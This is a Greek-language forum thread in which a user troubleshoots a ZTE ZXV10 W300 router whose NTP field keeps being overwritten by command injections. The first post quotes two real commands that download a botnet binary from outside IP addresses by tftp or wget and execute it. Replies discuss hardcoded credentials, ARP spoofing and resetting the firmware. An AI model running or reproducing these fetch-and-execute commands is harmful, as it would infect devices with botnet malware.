Εμφάνιση 1-7 από 7
  1. #1
    Εγγραφή
    02-11-2006
    Περιοχή
    Stockholm
    Ηλικία
    32
    Μηνύματα
    91
    Downloads
    1
    Uploads
    0
    Τύπος
    Cable
    Ταχύτητα
    250/10 Mbps
    ISP
    ComHem
    Exclamation
    Καλημέρα,

    πριν λίγες μέρες άλλαξα το FritzBox! που είχα ως router στην vodafone γραμμή μου με ένα ZXV10 W300 που μου έχει μείνει από τον ΟΤΕ. Με χαρά είδα ότι συγχρονίζει σε μεγαλύτερη ταχύτητα και είπα να το κρατήσω. Το πρόβλημα είναι όμως ότι παρατήρησα ότι στις ρυθμίσεις του NTP server και συγκεκριμένα στο πεδίο που βάζεις την διεύθυνση του, με κάποιο τρόπο η τιμή 0.0.0.0 (που είναι το default) αλλάξε σε:
    Κώδικας:
    `cd /tmp;tftp -l4 -r4 -g 79.167.240.121 28801;chmod 777 4;./4`
    Αυτό προφανώς είναι command injection στο router μου!

    Για να εμποδίσω αυτό έχω προβεί σε διάφορες ενέργειες όπως είναι:
    - Στο ACL επιτρέπω πρόσβαση (Web, telnet, FTP, TFTP, SNMP και Ping) μόνο στο LAN interface
    - Έχω αλλάξει τον κωδικό στους δύο default χρήστες του router και στον admin
    - Έχω απενεργοποιήσει το samba που είχε κρυφά ενεργοποιημένο
    - Γενικά έχω αλλάξει όλα τα default passwords του configuration σε δικά μου

    Το πρόβλημα είναι ότι παρόλα αυτά, το πεδίο αυτό συνεχίζει να αλλάζει σε τέτοιου είδους command injections (με διαφορετικές IP κάθε φορά) ακόμα και αν βάλω την ρύθμιση της ώρας σε manual...

    π.χ. ένα ακόμα είναι:
    Κώδικας:
    `cd /tmp;wget http://79.167.103.92:55483/4;chmod 777 4;./4`
    Τέλος, μπήκα με telnet στο router και όντως βρήκα το αρχείο /tmp/4 με δικαιώματα rwx από όλους τους χρήστες και το οποίο σύμφωνα με το VirusTotal είναι το Linux/Hajime-A botnet!

    Υ.Γ. Το firmware του router είναι το W300V1.1.3k_ZRD_GR2_A68
    Τελευταία επεξεργασία από το μέλος sotirisko : 15-12-17 στις 10:33. Αιτία: Υ.Γ.

  2. #2
    Εγγραφή
    16-07-2004
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    55
    Μηνύματα
    2.048
    Downloads
    0
    Uploads
    0
    Τύπος
    PSTN
    Ταχύτητα
    20480/1024
    ISP
    ΟΤΕ Conn-x
    Router
    ZTE w300i
    Path Level
    Interleaved
    Το router σου έχει hardcoded credentials, όσους κωδικούς και να αλλάξεις, τζίφος
    Δες εδώ: https://www.exploit-db.com/exploits/31527/
    Όλα τα παιχνίδια android που έχω φτιάξει περιγράφονται και κατεβαίνουν
    από εδώ: https://play.google.com/store/apps/d...=Carbon+People

  3. #3
    Εγγραφή
    02-11-2006
    Περιοχή
    Stockholm
    Ηλικία
    32
    Μηνύματα
    91
    Downloads
    1
    Uploads
    0
    Τύπος
    Cable
    Ταχύτητα
    250/10 Mbps
    ISP
    ComHem
    Ναι, το είχα βρει αυτό το exploit αλλά:
    1) Έχω μπλοκάρει την πρόσβαση σε telnet από το WAN (από το ACL επιτρέπω telnet μόνο σε LAN θεωρητικά πάντα)
    2) Δοκίμασα να μπω με telnet χρησιμοποιώντας αυτό το password αλλά δεν έμπαινε οπότε θεώρησα ότι στην έκδοση του firmware που έχω έχει διορθωθεί αυτό (το exploit είναι από το 2014)

  4. #4
    Εγγραφή
    17-02-2012
    Περιοχή
    Κερκυρα
    Ηλικία
    55
    Μηνύματα
    11.813
    Downloads
    1
    Uploads
    0
    Τύπος
    ADSL2+
    Ταχύτητα
    11-14 / 1 Mbps
    ISP
    COSMOTE
    DSLAM
    ΟΤΕ - ΓΑΡΔΕΛΑΔΕΣ
    Router
    Διαφορα
    SNR / Attn
    8(dB) / 35(dB)
    Path Level
    Fastpath
    Προσφατα υπαρχει και το wifi wpa2 hack που θελει αναβαθμηση και το modem (αλλα και η καρτα στο laptop, κινητο κλπ)
    https://www.techadvisor.co.uk/how-to...-wifi-3665453/
    θα ελεγα να το ξεχασεις, εγω εχω να βαλω επανω απο οταν μου το πρωτο εδωσαν (5 χρονια)

  5. #5
    Εγγραφή
    16-07-2004
    Περιοχή
    Θεσσαλονίκη
    Ηλικία
    55
    Μηνύματα
    2.048
    Downloads
    0
    Uploads
    0
    Τύπος
    PSTN
    Ταχύτητα
    20480/1024
    ISP
    ΟΤΕ Conn-x
    Router
    ZTE w300i
    Path Level
    Interleaved
    Νομίζω ότι είχα δεί το W300V1.1.3k_ZRD_GR2_D68 σαν τελευταίο, ή κάνω λάθος.

    Υπάρχει φυσικά πιθανότητα ήδη να είχε μόνιμα εγκατεστημένο bakcdoor το router σου
    και μόνο με reset/firmware upgrade το αφαιρέσεις.

    Σε κάθε περίπτωση, οι ACL λίστες δεν παρέχουν προστασία, έχει γραφεί παντού μια και τόσο
    το ip, όσο και το mac γίνονται hijack με ARP spoofing ακόμα over wifi πριν το auth.

    Προτείνω firmware upgrade + reset πριν συνεχίσεις...
    Όλα τα παιχνίδια android που έχω φτιάξει περιγράφονται και κατεβαίνουν
    από εδώ: https://play.google.com/store/apps/d...=Carbon+People

  6. #6
    Εγγραφή
    17-02-2012
    Περιοχή
    Κερκυρα
    Ηλικία
    55
    Μηνύματα
    11.813
    Downloads
    1
    Uploads
    0
    Τύπος
    ADSL2+
    Ταχύτητα
    11-14 / 1 Mbps
    ISP
    COSMOTE
    DSLAM
    ΟΤΕ - ΓΑΡΔΕΛΑΔΕΣ
    Router
    Διαφορα
    SNR / Attn
    8(dB) / 35(dB)
    Path Level
    Fastpath
    καπου ειχα το site του οτε με το link για λογισμικα, σε αναβαθμηση του ZTE 300, το εχει κανεις αν εβγαλε αυτο το μηνα καινουριο λογισμικο με το wpa2 hack?

  7. #7
    Εγγραφή
    02-11-2006
    Περιοχή
    Stockholm
    Ηλικία
    32
    Μηνύματα
    91
    Downloads
    1
    Uploads
    0
    Τύπος
    Cable
    Ταχύτητα
    250/10 Mbps
    ISP
    ComHem
    Ναι, το γνωρίζω το WPA2 hack αλλά η περιπτωσή μου δεν σχετίζεται με αυτό...
    Προς το παρόν έκανα ακόμα ένα factory reset και παρατήρησα ότι αν βάλω σαν NTP server έναν δικό μου και όχι 0.0.0.0 δεν αλλάζει μετά σε command injection (τουλάχιστον μέχρι τώρα). Επομένως μπορεί να παίζει και θέμα με τον default NTP server της ZTE...

Παρόμοια Θέματα

  1. ADSL WIND και modem ZTE ZXV10 H108L
    Από dimivasi στο φόρουμ Wind
    Μηνύματα: 1646
    Τελευταίο Μήνυμα: 08-10-20, 21:47
  2. ΔΕΝ ΜΟΥ ΚΡΑΤΑΕΙ ΤΟ ΟΛΟΓΡΑΦΩΣ ΣΤΗΝ ΑΠΟΘΗΚΕΥΣΗ ΚΑΙ ΣΤΗΝ ΕΚΤΥΠΩΣΗ
    Από ddiid στο φόρουμ Προγραμματισμός και γλώσσες προγραμματισμού
    Μηνύματα: 0
    Τελευταίο Μήνυμα: 07-08-17, 15:30
  3. ZXV10 H201L CYTA απενεργοποίηση WPS
    Από amyntaio στο φόρουμ ADSL
    Μηνύματα: 6
    Τελευταίο Μήνυμα: 30-06-17, 23:36
  4. ZXV10 H201L bridge mode
    Από georgecl στο φόρουμ ADSL
    Μηνύματα: 3
    Τελευταίο Μήνυμα: 07-04-17, 11:13
  5. [Other] ZTE ZXV10 H201L σε Globespan DSLAM
    Από alexnts στο φόρουμ ADSL & Broadband Hardware, routers και modems...
    Μηνύματα: 1
    Τελευταίο Μήνυμα: 02-02-17, 10:27

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας